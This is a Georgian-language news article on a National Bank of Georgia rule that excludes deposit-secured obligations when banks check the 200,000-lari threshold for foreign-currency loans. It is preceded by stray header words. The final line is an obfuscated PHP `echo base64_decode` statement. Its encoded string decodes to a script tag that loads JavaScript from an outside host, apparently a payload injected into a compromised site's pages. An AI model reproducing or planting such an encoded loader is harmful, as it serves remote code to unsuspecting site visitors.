celsiusi
ავერსი შნაიდერი

პირველი სექტემბრიდან სასესხო რეგულაცია მკაცრდება. საქართველოს ეროვნული ბანკის ვიცე-პრეზიდენტის, არჩილ მესტვირიშვილის ბრძანების თანახმად, დეპოზიტით უზრუნველყოფა მსესხებლის ჯამურ ვალდებულებაში აღარ გაითვალისწინება.

„საქართველოს სამოქალაქო კოდექსის 625-ე მუხლის მე-7 ნაწილის მიზნებისთვის (200 000-ლარიანი ზღვარი), სესხის გაცემის შედეგად ამავე გამსესხებლის მიმართ მსესხებლის ჯამური ვალდებულებების დათვლისას არ უნდა იქნეს გათვალისწინებული ფულადი სახსრებით უზრუნველყოფილი ვალდებულებები“, – აღნიშნულია ნორმატიულ აქტში.

ეროვნულ ბანკში მიაჩნიათ, რომ ახალი შეზღუდვით სავალუტო დაკრედიტების გავრცელებული პრაქტიკა მოისპობა. საუბარია შემთხვევაზე, როცა მსესხებელს შემოსავალი არ ჰყოფნის, რათა 200 000 ლარიანი ზღვარი და შესაბამისად, სავალუტო კრედიტზე მიუწვდება ხელი; მაგალითად, თუ შემოსავლები მხოლოდ 195 000 ლარამდე სესხის აღების შესაძლებლობას აძლევს, ანუ აკლდება 5 000 ლარი. დღეს მოქმედი რეგულაციის პირობებში გავრცელებული პრაქტიკით, ამ კატეგორიის პოტენციური მსესხებელი დეპოზიტზე ათავსებს 3 000 აშშ დოლარს, რაც ჯამურ ვალდებულებებში აისახება და აიღებს სავალუტო სესხს 70 000 $/€-ს (200 000 ლარს). ევროში დაკრედიტება დოლართან გაუფასურების პირობებში უფრო მიმზიდველი გახდა, ვინაიდან ამ დროისთვის, ერთი ევრო 1,02 დოლარი ღირს, ხოლო წინა კვირის განმავლობაში კურსი გათანაბრებულიც იყო.

ასევე ეროვნული ბანკის გადაწყვეტილებით, დასაშვები ხდება სავალუტო დაკრედიტება 200 000 ლარამდეც, თუ მსესხებელს სავალუტო დეპოზიტიც ექნება. სებ-ი ამ რეგულაციაში მომხმარებელზე ზრუნვის მოტივს ხედავს. გავრცელებული პრაქტიკით, სავალუტო დეპოზიტარს ვალუტის საჭიროება რომ უჩნდება, უწევს საანაბრე პირობების დარღვევა, ცვლილების ამოქმედების შემდეგ კი, დეპოზიტს აღარ მოაკლებს და საჭიროებისამებრ სესხს აიღებს.

ახალი წესის შედეგად, იმ პირებს, ვისაც უცხოურ ვალუტაში შესაბამისი ზომის დეპოზიტი აქვთ, შეუძლიათ, ქართული ბანკებიდან სავალუტო კრედიტებით ისარგებლონ. ამასთანავე, არ არის განსაზღვრული ამ სესხების ქვედა ზღვარი; შესაბამისად, ეს შეიძლება, იყოს ნებისმიერი ზომის სესხი 200 000 ლარამდე.

702
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");